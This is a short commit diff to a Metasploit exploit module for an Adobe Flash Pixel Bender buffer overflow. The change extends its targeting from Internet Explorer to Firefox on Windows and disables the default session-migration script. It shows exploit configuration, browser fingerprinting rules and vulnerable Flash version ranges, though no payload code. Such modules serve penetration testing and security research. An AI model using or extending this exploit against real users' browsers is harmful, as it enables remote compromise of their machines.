Allow exploitation also on FF

2014-05-18 23:24:01 -05:00 · 2014-05-18 23:24:01 -05:00 · 975cdcb537
parent 033757812d
commit 975cdcb537
1 changed files with 3 additions and 4 deletions
--- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
        },
      'DefaultOptions'  =>
        {
-          'InitialAutoRunScript' => 'migrate -f',
+          # Disabled by default to allow sessions on Firefox, still useful when exploiting IE
+          #'InitialAutoRunScript' => 'migrate -f',
          'Retries'              => false,
          'EXITFUNC'             => "thread"
        },
@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
-          #:clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
-          #:method  => "LoadMovie",
          :os_name => Msf::OperatingSystems::WINDOWS,
-          #:ua_name => Msf::HttpClients::IE,
+          :ua_name => lambda { |ua| print_status(ua); ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF},
          :flash   => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
        },
      'Targets'        =>